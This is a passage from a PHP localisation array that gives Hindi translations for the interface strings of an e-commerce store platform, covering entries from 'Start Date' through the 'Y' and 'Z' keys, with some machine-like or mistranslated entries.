'Start Date' => 'आरंभ करने की तिथि', 'Start a conversation' => 'एक बातचीत शुरू', 'Start_Date' => 'आरंभ करने की तिथि', 'Start_From' => 'से शुरु करें', 'State' => 'राज्य', 'Static Stock Limit' => 'स्थैतिक स्टॉक सीमा', 'Statistics' => 'आंकड़े', 'Status' => 'स्थिति', 'Status Change successfully' => 'स्थिति सफलतापूर्वक बदलती है', 'Status Change successfully !' => 'स्थिति सफलतापूर्वक बदलें!', 'Status updated failed. Product must be approved' => 'अद्यतन की गई स्थिति विफल रही। उत्पाद को मंजूरी दी जानी चाहिए', 'Status updated successfully' => 'स्थिति को सफलतापूर्वक अपडेट किया गया', 'Status_updated_failed.' => 'अद्यतन की गई स्थिति विफल रही।', 'Stock_Available' => 'स्टॉक उपलब्ध', 'Stock_Not_Available' => 'स्टॉक उपलब्ध नहीं है', 'Stock_Status' => 'स्टॉक की अवस्था', 'Stock_not_available' => 'स्टॉक उपलब्ध नहीं है', 'Store' => 'इकट्ठा करना', 'Store_Address' => 'भंडार पता', 'Store_Banner' => 'भंडार बैनर', 'Store_Bottom_Banner' => 'स्टोर बॉटम बैनर', 'Store_Client_ID' => 'स्टोर क्लाइंट आईडी', 'Store_Client_Secret_Key' => 'स्टोर क्लाइंट सीक्रेट कुंजी', 'Store_List' => 'भंडार सूची', 'Store_Logo' => 'लोगो भंडार', 'Store_Name' => 'स्टोर नाम', 'Store_Secondary_Banner' => 'भंडार बैनर', 'Story Book' => 'कथा पुस्तक', 'String' => 'डोरी', 'Stripe' => 'पट्टी', 'Sub' => 'विषय', 'Sub Category' => 'उप श्रेणी', 'Sub Category deleted Successfully.' => 'उप श्रेणी सफलतापूर्वक हटा दिया गया।', 'Sub Sub Category' => 'उप उप श्रेणी', 'Sub Sub Category deleted Successfully.' => 'उप उप श्रेणी सफलतापूर्वक हटा दी गई।', 'Sub type=> I m not a robot Checkbox' => 'उप प्रकार=> मैं एक रोबोट चेकबॉक्स नहीं हूं', 'Sub_Categories' => 'उप श्रेणियां', 'Sub_Category' => 'उप श्रेणी', 'Sub_Category_deleted_Successfully.' => 'उप श्रेणी सफलतापूर्वक हटा दिया गया।', 'Sub_Sub_Categories' => 'उप उप श्रेणियां', 'Sub_Sub_Category_Deleted_Successfully' => 'उप उप श्रेणी सफलतापूर्वक हटा दिया गया', 'Sub_Title' => 'उप -शीर्षक', 'Sub_category' => 'उप श्रेणी', 'Sub_sub_category' => 'उप उप श्रेणी', 'Sub_total' => 'उप -कुल', 'Subject' => 'विषय', 'Submit' => 'जमा करना', 'Submit Reply' => 'जवाब सबमिट करें', 'Submit message' => 'संदेश जमा करें', 'Submit_a_Deliveryman_Review' => 'एक डिलीवरीमैन समीक्षा सबमिट करें', 'Submit_a_review' => 'एक समीक्षा प्रस्तुत करें', 'Subscribe to out neew channel to get latest updates' => 'नवीनतम अपडेट प्राप्त करने के लिए NEEW चैनल की सदस्यता लें', 'Subtotal' => 'उप-योग', 'Super Store Online' => 'सुपर स्टोर ऑनलाइन', 'Support' => 'सहायता', 'Support Ticket' => 'समर्थन टिकट', 'Support Ticket Answer' => 'समर्थन टिकट उत्तर', 'Support Tickets' => 'टिकट का समर्थन करें', 'Support_Section' => 'सहायता अनुभाग', 'Support_Ticket' => 'समर्थन टिकट', 'Support_Ticket_Inbox' => 'समर्थन टिकट इनबॉक्स', 'System Default currency updated successfully!' => 'सिस्टम डिफ़ॉल्ट मुद्रा सफलतापूर्वक अपडेट की गई!', 'System Settings' => 'प्रणाली व्यवस्था', 'System_Settings' => 'प्रणाली व्यवस्था', 'System_Setup' => 'सिस्टम सेटअप', 'TAX' => 'कर', 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product' => 'कर को बाहर करने के लिए उत्पाद कर को बाहर कर दें उत्पाद कर को बाहर कर दें उत्पाद कर बहिष्कृत उत्पाद', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product' => 'कर में उत्पाद कर शामिल उत्पाद कर शामिल है जिसमें उत्पाद कर शामिल है', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ' => 'कर में उत्पाद कर शामिल उत्पाद कर शामिल है जिसमें उत्पाद कर शामिल है', 'THANK YOU' => 'धन्यवाद', 'THANK_YOU' => 'धन्यवाद', 'TV & Home Appliance' => 'टीवी और घर उपकरण', 'Table' => 'मेज़', 'Tax' => 'कर', 'Tax Collected' => 'कर एकत्र किया गया कर', 'Tax Given' => 'कर दिया गया', 'Tax_Collected' => 'कर एकत्र किया गया कर', 'Tax_Model' => 'कर मॉडल', 'Team ID' => 'टीम आईडी', 'Tech Light' => 'टेक लाइट', 'Tech Shop' => 'टेक -दुकान', 'Techno Lab' => 'टेक्नो लैब', 'Television' => 'टेलीविजन', 'Tell us' => 'हमें बताओ', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'अस्थायी ओटीपी ब्लॉक समय गलत ओटीपी सबमिशन के लिए एक निर्दिष्ट अवधि के लिए ओटीपी सेवा तक पहुंच को प्रतिबंधित करने के लिए सिस्टम द्वारा लागू एक सुरक्षा उपाय को संदर्भित करता है।', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'अस्थायी लॉगिन ब्लॉक समय गलत पासवर्ड सबमिशन के लिए एक निर्दिष्ट अवधि के लिए पहुंच को प्रतिबंधित करने के लिए सिस्टम द्वारा कार्यान्वित एक सुरक्षा उपाय को संदर्भित करता है', 'Temporary_Closed' => 'अस्थायी बंद', 'Term_&_Conditions' => 'शब्द और शर्तें', 'Terms & Condition' => 'नियम एवं शर्तें', 'Terms & Conditions' => 'नियम एवं शर्तें', 'Terms and Condition' => 'नियम और शर्तें', 'Terms_&_Conditions' => 'नियम एवं शर्तें', 'Terms_&_Policy' => 'शर्तें और नीति', 'Terms_and_Conditions' => 'नियम और शर्तें', 'Test Product' => 'परीक्षण उत्पाद', 'Test_Email_Sender' => 'परीक्षण ईमेल प्रेषक', 'Text' => 'मूलपाठ', 'Thank_you_for_your_verification' => 'आपके सत्यापन के लिए धन्यवाद', 'Thanks for your order' => 'आपके आदेश के लिए धन्यवाद', 'The Wall' => 'दीवार', 'The billing period for your paid subscription to Google Workspace begins tomorrow.' => 'अच्छा', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'अधिकतम ओटीपी हिट एक माप है कि एक विशिष्ट एक बार पासवर्ड कितनी बार उत्पन्न हुआ है और एक समय के भीतर उपयोग किया गया है।', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'अधिकतम लॉगिन हिट इस बात का एक उपाय है कि उपयोगकर्ता एक समय के भीतर कितनी बार पासवर्ड जमा कर सकता है।', 'The_file_upload_field_is_required' => 'फ़ाइल अपलोड फ़ील्ड की आवश्यकता है', 'The_product_report_will_show_based_on_the_product_added_date' => 'उत्पाद रिपोर्ट उत्पाद जोड़ा तिथि के आधार पर दिखाई देगी', 'Theme Changed to Theme Aster' => 'थीम को थीम एस्टर में बदल दिया गया', 'Theme Changed to Theme Fashion' => 'थीम फैशन में बदल गया', 'Think before you proceed' => 'आगे बढ़ने से पहले सोचें', 'Third step' => 'तीसरा चरण', 'This' => 'यह', 'This Currency cannot be removed due to payment gateway dependency!' => 'भुगतान गेटवे निर्भरता के कारण इस मुद्रा को हटाया नहीं जा सकता है!', 'This Month' => 'इस महीने', 'This Month s Statistics' => 'इस महीने के आंकड़े', 'This Months Statistics' => 'इस महीने के आंकड़े', 'This Week' => 'इस सप्ताह', 'This Year' => 'इस साल', 'This Year Earning' => 'इस वर्ष की कमाई', 'This is not an image file' => 'यह एक छवि फ़ाइल नहीं है', 'This page is for A4 size page printer so it won t be visible in smaller devices' => 'यह पृष्ठ A4 आकार पृष्ठ प्रिंटर के लिए है, इसलिए यह छोटे उपकरणों में दिखाई दे रहा है', 'This_Month' => 'इस महीने', 'This_Week' => 'इस सप्ताह', 'This_Year' => 'इस साल', 'This_field_required' => 'इस क्षेत्र की आवश्यकता है', 'This_page_contains_sensitive_information.Make_sure_before_changing.' => 'इस पृष्ठ में संवेदनशील जानकारी है। बदलने से पहले सुनिश्चित करें।', 'This_page_is_having_sensitive_data.Make_sure_before_changing.' => 'यह पृष्ठ संवेदनशील डेटा है। बदलने से पहले सुनिश्चित करें।', 'This_shop_is_in_temporary_closed' => 'यह दुकान अस्थायी रूप से बंद है', 'This_shop_is_in_vacation_mode' => 'यह दुकान छुट्टी मोड में है', 'Title' => 'शीर्षक', 'To' => 'को', 'To get site key and secret keyGo to the Credentials page' => 'क्रेडेंशियल्स पेज पर साइट कुंजी और गुप्त कीगो प्राप्त करने के लिए', 'To_visit_your_currently_active_sms_gateway_settings_please_follow_the_link.' => 'अपने वर्तमान में सक्रिय एसएमएस गेटवे सेटिंग्स पर जाने के लिए कृपया लिंक का पालन करें।', 'Today s Statistics' => 'आज के आंकड़े', 'Todays Statistics' => 'आज के आंकड़े', 'Todayâs_Best_Deal' => 'आज का सबसे अच्छा सौदा है', 'Token' => 'टोकन', 'Top' => 'शीर्ष', 'Top Freezer Refrigerator' => 'शीर्ष फ्रीजर रेफ्रिजरेटर', 'Top Side Banner' => 'शीर्ष साइड बैनर', 'Top Stores' => 'शीर्ष भंडार', 'Top_5_Product_Wise_Sale' => 'शीर्ष 5 उत्पाद वार बिक्री', 'Top_Delivery_Man' => 'शीर्ष वितरण आदमी', 'Top_Fashion_House' => 'शीर्ष फैशन हाउस', 'Top_Rated' => 'टॉप रेटेड', 'Top_Rated_Product_from_This_Store' => 'इस स्टोर से शीर्ष रेटेड उत्पाद', 'Top_Rated_Products' => 'शीर्ष रेटेड उत्पाद', 'Top_Rated_Seller' => 'सबसे चहीता विक्रेता', 'Top_Stores' => 'शीर्ष भंडार', 'Top_selling_products' => 'शीर्ष विक्रय उत्पाद', 'Topic' => 'विषय', 'Total' => 'कुल', 'Total Amount' => 'कुल राशि', 'Total Amount Sold' => 'बेची गई कुल राशि', 'Total Customers' => 'कुल ग्राहक', 'Total Discount Given' => 'दी गई कुल छूट', 'Total Earning' => 'कुल कमाई', 'Total Earnings' => 'कुल कमाई', 'Total Expense' => 'कुल खर्च', 'Total In-House Products' => 'कुल इन-हाउस उत्पाद', 'Total Order' => 'कुल आदेश', 'Total Orders' => 'कुल आदेश', 'Total Price' => 'कुल कीमत', 'Total Product' => 'कुल उत्पाद', 'Total Products' => 'कुल उत्पाद', 'Total Sale' => 'कुल बिक्री', 'Total Sales' => 'कुल बिक्री', 'Total Seller' => 'कुल विक्रेता', 'Total Seller Products' => 'कुल विक्रेता उत्पाद', 'Total Stock' => 'कुल स्टॉक', 'Total Stores' => 'कुल भंडार', 'Total Transactions' => 'कुल लेनदेन', 'Total in Wishlist' => 'विशलिस्ट में कुल', 'Total orders of' => 'के कुल आदेश', 'Total_Amount' => 'कुल राशि', 'Total_Amount_Sold' => 'बेची गई कुल राशि', 'Total_Balance' => 'कुल शेष', 'Total_Commission_given' => 'दी गई कुल आयोग', 'Total_Coupon_Discount' => 'कुल कूपन छूट', 'Total_Delivery_Charge' => 'कुल वितरण प्रभार', 'Total_Deliveryman' => 'कुल वितरण', 'Total_Discount_Given' => 'दी गई कुल छूट', 'Total_Discounted_Amount' => 'कुल रियायती राशि', 'Total_Earning' => 'कुल कमाई', 'Total_Earnings' => 'कुल कमाई', 'Total_Expense' => 'कुल खर्च', 'Total_Expense_Amount' => 'कुल व्यय राशि', 'Total_In-House_Products' => 'कुल इन-हाउस उत्पाद', 'Total_Order' => 'कुल आदेश', 'Total_Order_Amount' => 'कुल आदेश राशि', 'Total_Ordered_Product_Price' => 'कुल आदेशित उत्पाद मूल्य', 'Total_Orders' => 'कुल आदेश', 'Total_Point' => 'कुल बिंदु', 'Total_Points' => 'कुल अंक', 'Total_Price_For_This_Product' => 'इस उत्पाद के लिए कुल कीमत', 'Total_Product' => 'कुल उत्पाद', 'Total_Product_Amount' => 'कुल उत्पाद राशि', 'Total_Product_Discount' => 'कुल उत्पाद छूट', 'Total_Product_Sale' => 'कुल उत्पाद बिक्री', 'Total_Products' => 'कुल उत्पाद', 'Total_Quantity_Sold' => 'कुल मात्रा बेची गई', 'Total_Sale' => 'कुल बिक्री', 'Total_Sales' => 'कुल बिक्री', 'Total_Seller' => 'कुल विक्रेता', 'Total_Seller_Products' => 'कुल विक्रेता उत्पाद', 'Total_Shop' => 'कुल दुकान', 'Total_Shop_Earnings' => 'कुल दुकान आय', 'Total_Store_Earnings' => 'कुल भंडार आय', 'Total_Stores' => 'कुल भंडार', 'Total_Tax' => 'कुल कर', 'Total_amount' => 'कुल राशि', 'Total_refundable_amount' => 'कुल वापसी योग्य राशि', 'Totals_Cost' => 'कुल लागत', 'ToysKids & Babies' => 'खिलौने बच्चे और बच्चे', 'Track' => 'रास्ता', 'Track Order' => 'ऑर्डर पर नज़र रखना', 'Track Order Result' => 'ट्रैक ऑर्डर परिणाम', 'Track_Order' => 'ऑर्डर पर नज़र रखना', 'Track_Order_Result' => 'ट्रैक ऑर्डर परिणाम', 'Track_Order_Result ' => 'ट्रैक ऑर्डर परिणाम', 'Track_order' => 'ऑर्डर पर नज़र रखना', 'Transaction' => 'लेन-देन', 'Transaction Date' => 'कार्यवाही की तिथि', 'Transaction Id' => 'लेन -देन आईडी', 'Transaction Statistics' => 'लेन -देन सांख्यिकी', 'Transaction_Date' => 'कार्यवाही की तिथि', 'Transaction_History' => 'ट्रांजेक्शन इतिहास', 'Transaction_Report' => 'लेन -देन रिपोर्ट', 'Transactions' => 'लेनदेन', 'Translate' => 'अनुवाद', 'True' => 'सत्य', 'TrueMake' => 'ट्रूमेक', 'Try after sometime' => 'कुछ समय बाद कोशिश करो', 'Turn off' => 'बंद करें', 'Turn on' => 'चालू करो', 'Twitter' => 'ट्विटर', 'Twitter API Set up Instructions' => 'ट्विटर एपीआई ने निर्देश दिए', 'Type' => 'प्रकार', 'Type Answer' => 'जवाब टाइप करें', 'Type Question' => 'प्रकार का प्रश्न', 'Type your message' => 'अपना संदेश टाइप करें', 'Type_your_message' => 'अपना संदेश टाइप करें', 'UPDATE_ADDRESSES' => 'अद्यतन पते', 'USE_COUPON' => 'कूपन का उपयोग करें', 'Under_this_menu_you_can_setup_all_the_new_features_option_that_are_only_available_for_that_specific_theme.' => 'इस मेनू के तहत आप सभी नए फीचर्स विकल्प सेटअप कर सकते हैं जो केवल उस विशिष्ट विषय के लिए उपलब्ध हैं।', 'Unfollow' => 'करें', 'Unfollow_Complete' => 'अनफॉलो पूरा', 'Unfollow_now' => 'अब अनफॉलो', 'Unit' => 'इकाई', 'Unit Price' => 'यूनिट मूल्य', 'Unit is required!' => 'यूनिट की आवश्यकता है!', 'Unit price' => 'यूनिट मूल्य', 'Unit_Price' => 'यूनिट मूल्य', 'Unit_Price_=>' => 'यूनिट मूल्य =>', 'Unit_price' => 'यूनिट मूल्य', 'Unpaid' => 'अवैतनिक', 'Upcoming_Campaign' => 'आगामी अभियान', 'Update' => 'अद्यतन', 'Update & Publish' => 'अद्यतन और प्रकाशित करें', 'Update Currency' => 'अद्यतन मुद्रा', 'Update Deal' => 'अद्यतन सौदा', 'Update Deal of The Day' => 'दिन का अद्यतन सौदा', 'Update Notification' => 'अद्यतन अधिसूचना', 'Update Phone' => 'अद्यतन फोन', 'Update delivery-man' => 'अद्यतन वितरण-आदमी', 'Update option is disabled for demo' => 'अद्यतन विकल्प डेमो के लिए अक्षम है', 'Update your bank info first!' => 'पहले अपनी बैंक जानकारी अपडेट करें!', 'Update_Address' => 'अद्यतन पता', 'Update_Deliveryman' => 'अद्यतन डिलीवरी', 'Update_Profile' => 'प्रोफ़ाइल अपडेट करें', 'Update_this_Address' => 'इस पते को अपडेट करें', 'Updated_Successfully' => 'सफलतापूर्वक अपडेट किया गया', 'Updated_successfully' => 'सफलतापूर्वक अपडेट किया गया', 'Updated_unsuccessful' => 'अद्यतन असफल', 'Upload' => 'डालना', 'Upload product images' => 'उत्पाद चित्र अपलोड करें', 'Upload thumbnail' => 'थंबनेल अपलोड करें', 'Upload_File' => 'फ़ाइल अपलोड करें', 'Upload_image' => 'तस्विर अपलोड करना', 'Upload_product_images' => 'उत्पाद चित्र अपलोड करें', 'Upload_thumbnail' => 'थंबनेल अपलोड करें', 'Urgent' => 'अति आवश्यक', 'Use the code to change your password on our secure website' => 'हमारी सुरक्षित वेबसाइट पर अपना पासवर्ड बदलने के लिए कोड का उपयोग करें', 'Used' => 'इस्तेमाल किया गया', 'User' => 'उपयोगकर्ता', 'User_Management' => 'प्रयोक्ता प्रबंधन', 'User_Not_Exist' => 'उपभोक्ता अस्तित्व में नहीं हैं', 'User_details' => 'उपयोगकर्ता विवरण', 'Username' => 'उपयोगकर्ता नाम', 'VAT' => 'टब', 'VAT/TAX' => 'वैट टैक्स', 'Vacation_End' => 'अवकाश अंत', 'Vacation_Mode' => 'छुट्टी प्रणाली', 'Vacation_Note' => 'अवकाश नोट', 'Vacation_Start' => 'अवकाश शुरू', 'Valid OAuth Redirect URIs' => 'मान्य oauth पुनर्निर्देशित उरिस', 'Variant' => 'प्रकार', 'Variant Price' => 'प्रकार की कीमत', 'Variation' => 'उतार-चढ़ाव', 'Variations' => 'बदलाव', 'Vat' => 'टब', 'Verification code/ OTP mismatched' => 'सत्यापन कोड/ ओटीपी बेमेल', 'Verification_Code' => 'सत्यापन कोड', 'Verification_Successfully_Completed' => 'सत्यापन सफलतापूर्वक पूरा हुआ', 'Verify' => 'सत्यापित करें', 'Verify your email' => 'अपना ईमेल सत्यापित करें', 'View' => 'देखना', 'View Order Details' => 'आदेश विवरण देखो', 'View Products' => 'उत्पाद देखें', 'View_All' => 'सभी को देखें', 'View_All_cart_items' => 'सभी कार्ट आइटम देखें', 'View_Less' => 'कम देखें', 'View_More' => 'और देखें', 'View_User_Message' => 'उपयोगकर्ता संदेश देखें', 'View_all_cart_items' => 'सभी कार्ट आइटम देखें', 'View_more' => 'और देखें', 'View_style_updated' => 'स्टाइल अद्यतन देखें', 'Visit' => 'मिलने जाना', 'Visit Store' => 'भेंट की दुकान', 'Visit_Again' => 'पुनः पधारें', 'Visit_Shop' => 'यात्रा दुकान', 'Visit_Store' => 'भेंट की दुकान', 'Vivatiqo' => 'Vivatiqo', 'WISHLIST' => 'इच्छा-सूची', 'Wallet' => 'बटुआ', 'Wallet Amount' => 'बटुए की मात्रा', 'Wallet Payments' => 'बटुए भुगतान', 'Wallet_Payments' => 'बटुए भुगतान', 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB' => 'Waltro Vivobook X515EA INTEL CORE I3 1115G4 4GB DDR4 RAM 512GB', 'Want to add this product' => 'इस उत्पाद को जोड़ना चाहते हैं', 'Want to delete this item' => 'इस आइटम को हटाना चाहते हैं', 'Want_to_Add' => 'जोड़ना चाहते हैं', 'Want_to_Change_Default_Language_Status' => 'डिफ़ॉल्ट भाषा की स्थिति बदलना चाहते हैं', 'Want_to_Remove' => 'हटाना चाहते हैं', 'Want_to_Turn_OFF' => 'बंद करना चाहते हैं', 'Want_to_Turn_OFF_Coupon_Status' => 'कूपन की स्थिति को बंद करना चाहते हैं', 'Want_to_Turn_OFF_Language_Status' => 'भाषा की स्थिति को बंद करना चाहते हैं', 'Want_to_Turn_OFF_Offline_Payment_Methods' => 'ऑफ़लाइन भुगतान विधियों को बंद करना चाहते हैं', 'Want_to_Turn_OFF_Support_Ticket_Status' => 'समर्थन टिकट की स्थिति बंद करना चाहते हैं', 'Want_to_Turn_ON' => 'चालू करना चाहते हैं', 'Want_to_Turn_ON_Coupon_Status' => 'कूपन की स्थिति को चालू करना चाहते हैं', 'Want_to_Turn_ON_Language_Status' => 'भाषा की स्थिति को चालू करना चाहते हैं', 'Want_to_Turn_ON_Offline_Payment_Methods' => 'ऑफ़लाइन भुगतान विधियों को चालू करना चाहते हैं', 'Want_to_Turn_ON_Support_Ticket_Status' => 'समर्थन टिकट की स्थिति चालू करना चाहते हैं', 'Want_to_change_the_shipping_responsibility_to_Inhouse' => 'इनहाउस में शिपिंग जिम्मेदारी बदलना चाहते हैं', 'Want_to_delete_this_item' => 'इस आइटम को हटाना चाहते हैं', 'Want_to_disable_the_Maintenance_Mode' => 'रखरखाव मोड को अक्षम करना चाहते हैं', 'Want_to_enable_the_Maintenance_Mode' => 'रखरखाव मोड को सक्षम करना चाहते हैं', 'Want_to_order_your_usuals' => 'अपने सामान्य ऑर्डर करना चाहते हैं', 'Want_to_unfollow_this_shop' => 'इस दुकान को अनफॉलो करना चाहते हैं', 'Warning' => 'चेतावनी', 'Watches' => 'घड़ियों', 'We are sorry the page you requested could not be found' => 'हमें खेद है कि आपके द्वारा अनुरोधित पृष्ठ नहीं मिल सकता है', 'We are sorry server is not responding' => 'हमें खेद है कि सर्वर जवाब नहीं दे रहा है', 'We are sorry the page you requested could not be found' => 'हमें खेद है कि आपके द्वारा अनुरोधित पृष्ठ नहीं मिल सकता है', 'We are sorry, the page you requested could not be found' => 'हमें खेद है कि आपके द्वारा अनुरोधित पृष्ठ नहीं मिल सकता है', 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account' => 'हमने आपके आदेश के जवाब में आपको यह ईमेल भेजा है। आप अपने खाते में लॉगिन करने के बाद अपनी ऑर्डर की स्थिति देख पाएंगे', 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel' => 'हमने आपको यह ईमेल भेजा है कि आपके पास एक नया आदेश है। आप अपने पैनल में लॉगिन करने के बाद अपने आदेश देख पाएंगे', 'We will email you a temporary code' => 'हम आपको एक अस्थायी कोड ईमेल करेंगे', 'We will send email you a temporary code' => 'हम आपको एक अस्थायी कोड ईमेल भेजेंगे', 'We_Ensure_Quality_Support' => 'हम गुणवत्ता समर्थन सुनिश्चित करते हैं', 'We_Ensure_Secure_Transactions' => 'हम सुरक्षित लेनदेन सुनिश्चित करते हैं', 'Wearable' => 'पहनने योग्य', 'Web' => 'वेब', 'Web Config' => 'वेब विन्यास', 'Web application' => 'वेब अनुप्रयोग', 'Web_&_App_Settings' => 'वेब और ऐप सेटिंग्स', 'Webcam' => 'वेबकैम', 'Website' => 'वेबसाइट', 'Website Color' => 'वेबसाइट रंग', 'Website Favicon' => 'Website Favicon', 'Website Header Logo' => 'वेबसाइट प्रधान लोगो', 'Website Problem' => 'वेबसाइट समस्या', 'Website is under Maintenance' => 'वेबसाइट रखरखाव के अधीन है', 'Website problem' => 'वेबसाइट समस्या', 'Website_Color' => 'वेबसाइट रंग', 'Website_Footer_Logo' => 'वेबसाइट पाद लोगो', 'Website_problem' => 'वेबसाइट समस्या', 'Weekly' => 'साप्ताहिक', 'Weekly Delivery' => 'साप्ताहिक वितरण', 'Welcome To' => 'आपका स्वागत है', 'Welcome_message' => 'स्वागत संदेश', 'Wellness Fair' => 'वेलनेस फेयर', 'WhatsApp' => 'WhatsApp', 'Wireless' => 'तार रहित', 'Wireless Earbuds' => 'वायरलेस ईयरबड्स', 'Wish_List' => 'इच्छा सूची', 'Wish_Listed_Products' => 'सूचीबद्ध उत्पादों की कामना', 'Wishlist' => 'इच्छा-सूची', 'Wishlisted_Products' => 'विशलित उत्पाद', 'Withdraw' => 'निकालना', 'Withdraw Request' => 'अनुरोध वापस लें', 'Withdraw Request Table' => 'अनुरोध तालिका वापस लें', 'Withdraw information View' => 'सूचना दृश्य वापस लें', 'Withdraw request process' => 'अनुरोध प्रक्रिया वापस लें', 'Withdraw request sent successfully!' => 'वापस भेजा अनुरोध सफलतापूर्वक भेजा!', 'Withdraw_Request' => 'अनुरोध वापस लें', 'Withdraw_Request_Table' => 'अनुरोध तालिका वापस लें', 'Withdrawable Balance' => 'वापस लेने योग्य संतुलन', 'Withdrawable_balance' => 'वापस लेने योग्य संतुलन', 'Withdrawal_Method' => 'निकासी पद्धति', 'Withdrawal_Methods' => 'निकासी के तरीके', 'Withdrawal_method_List' => 'निकासी विधि सूची', 'Withdrawble Balance' => 'निकासी संतुलन', 'Withdrawble_Balance' => 'निकासी संतुलन', 'Women s fashion' => 'औरतों का फ़ैशन', 'Women s long-sleeve lightweight french terry fleece quarter-zip top' => 'महिलाओं की लंबी आस्तीन हल्के फ्रेंच टेरी फ्लेस क्वार्टर-ज़िप टॉप', 'Write your message here...' => 'यहां अपना संदेश लिखें...', 'Write_something' => 'कुछ लिखना', 'Write_something ' => 'कुछ लिखना', 'XID' => 'ज़िंदगी', 'Yes' => 'हाँ', 'Yes Change it' => 'हाँ इसे बदलो', 'Yes Change it!' => 'हाँ इसे बदलो!', 'Yes delete it' => 'हाँ इसे हटा दें', 'Yes Change it' => 'हाँ इसे बदलो', 'Yes Change it!' => 'हाँ इसे बदलो!', 'Yes delete it' => 'हाँ इसे हटा दें', 'Yes delete it!' => 'हाँ इसे हटा दें!', 'Yes_delete_it' => 'हाँ इसे हटा दें', 'You already subcribed this site!!' => 'आप पहले से ही इस साइट को अधीन कर चुके हैं !!', 'You can download the example file to understand how the data must be filled' => 'आप यह समझने के लिए उदाहरण फ़ाइल डाउनलोड कर सकते हैं कि डेटा कैसे भरा जाना चाहिए', 'You can download the example file to understand how the data must be filled.' => 'आप यह समझने के लिए उदाहरण फ़ाइल डाउनलोड कर सकते हैं कि डेटा कैसे भरा जाना चाहिए।', 'You can get brand and category id from their list' => 'आप उनकी सूची से ब्रांड और श्रेणी आईडी प्राप्त कर सकते हैं', 'You can get brand and category id from their list please input the right ids' => 'आप उनकी सूची से ब्रांड और श्रेणी आईडी प्राप्त कर सकते हैं कृपया सही आईडी इनपुट करें', 'You can get brand and category id from their list please input the right ids' => 'आप उनकी सूची से ब्रांड और श्रेणी आईडी प्राप्त कर सकते हैं कृपया सही आईडी इनपुट करें', 'You can upload your product images in product folder from gallery' => 'आप गैलरी से उत्पाद फ़ोल्डर में अपने उत्पाद छवियों को अपलोड कर सकते हैं', 'You can upload your product images in product folder from gallery and copy image`s path' => 'आप गैलरी से उत्पाद फ़ोल्डर में अपने उत्पाद छवियों को अपलोड कर सकते हैं और छवि के पथ को कॉपी कर सकते हैं', 'You have new order Check Please' => 'आपके पास नए ऑर्डर की जाँच है', 'You have new order Check Please' => 'आपके पास नए ऑर्डर की जाँच है', 'You order has been confirmed and will be shipped according to the method you selected!' => 'आपको ऑर्डर की पुष्टि की गई है और आपके द्वारा चुनी गई विधि के अनुसार भेज दिया जाएगा!', 'You will not be able to revert this' => 'आप इसे वापस नहीं कर पाएंगे', 'You wont be able to revert this!' => 'आप इसे वापस करने में सक्षम नहीं होंगे!', 'You_May_Also_Like' => 'आपको यह भी पसंद आ सकता हैं', 'You_can_check_our' => 'आप हमारी जाँच कर सकते हैं', 'You_can_track_your_order_by_clicking_the_below_button' => 'आप नीचे दिए गए बटन पर क्लिक करके अपने ऑर्डर को ट्रैक कर सकते हैं', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'आप अभी के लिए इस दुकान से गाड़ी में उत्पाद नहीं जोड़ सकते', 'You_want_to_change_refund_status!!' => 'आप धनवापसी स्थिति बदलना चाहते हैं !!', 'You_want_to_remove_all_items_from_cart!!' => 'आप कार्ट से सभी वस्तुओं को हटाना चाहते हैं !!', 'You_will not_be_able_to_revert_this' => 'आप इसे वापस नहीं कर पाएंगे', 'You_will_not_be_able_to_revert_this' => 'आप इसे वापस नहीं कर पाएंगे', 'You_will_not_be_able_to_revert_this!' => 'आप इसे वापस नहीं कर पाएंगे!', 'You_wont_be_able_to_revert_this!' => 'आप इसे वापस करने में सक्षम नहीं होंगे!', 'Your Earnings' => 'आपकी कमाई', 'Your Email Address' => 'आपका ईमेल पता', 'Your Message Send Successfully' => 'आपका संदेश सफलतापूर्वक भेजें', 'Your existing session token does not authorize you any more' => 'आपका मौजूदा सत्र टोकन आपको किसी और को अधिकृत नहीं करता है', 'Your first name' => 'आपका प्रथम नाम', 'Your order ID' => 'आपका ऑर्डर आईडी', 'Your subscription successfully done!!' => 'आपकी सदस्यता सफलतापूर्वक हुई !!', 'Your_Most_Searching' => 'आपकी सबसे अधिक खोज', 'Your_Order_is_Completed' => 'आपका आदेश पूरा हो गया है', 'Your_Privacy_Matter' => 'आपकी गोपनीयता मामला', 'Your_account_deleted_successfully!!' => 'आपका खाता सफलतापूर्वक हटा दिया गया !!', 'Your_order' => 'आपका आदेश', 'Your_order_ID' => 'आपका ऑर्डर आईडी', 'Your_password_must_be_at_least_8_characters' => 'आपका पासवर्ड कम से कम 8 अक्षर होना चाहिए', 'Your_shop_address' => 'आपकी दुकान का पता', 'Youtube video link' => 'YouTube वीडियो लिंक', 'Z-A' => 'जेड-ए', 'Z_A' => 'Z a', 'Z_to_A' => 'Z से a', 'Z_to_A_Order' => 'एक आदेश के लिए z', 'Zip Code' => 'ज़िप कोड', 'Zip_Code' => 'ज़िप कोड', '[Apple_Deveveloper_Account_Name - Team_ID]' => '[Apple Deveveloper खाता नाम - टीम आईडी]', '[This is the Service Key ID file and also after AuthKey_ that is the Key ID]' => '[यह सेवा कुंजी आईडी फ़ाइल है और यह भी कि प्रामाणिक आईडी है]', '_Color_Available' => 'रंग उपलब्ध है', '_again_ _you_will_see_the_saved_data.' => 'फिर से आप सहेजे गए डेटा को देखेंगे।', '_as_the_Digital_Payment_method' => 'डिजिटल भुगतान विधि के रूप में', '_as_the_SMS_Gateway' => 'एसएमएस गेटवे के रूप में', '_pc' => 'पीसी', '_points_required_to_convert_into_currency' => 'मुद्रा में परिवर्तित करने के लिए आवश्यक अंक', 'a_test_mail_will_be_send_to_your_email_to' => 'एक परीक्षण मेल आपके ईमेल पर भेज दिया जाएगा', 'a_test_mail_will_be_sent_to_your_email' => 'एक परीक्षण मेल आपके ईमेल पर भेजा जाएगा', 'a_to_z_order' 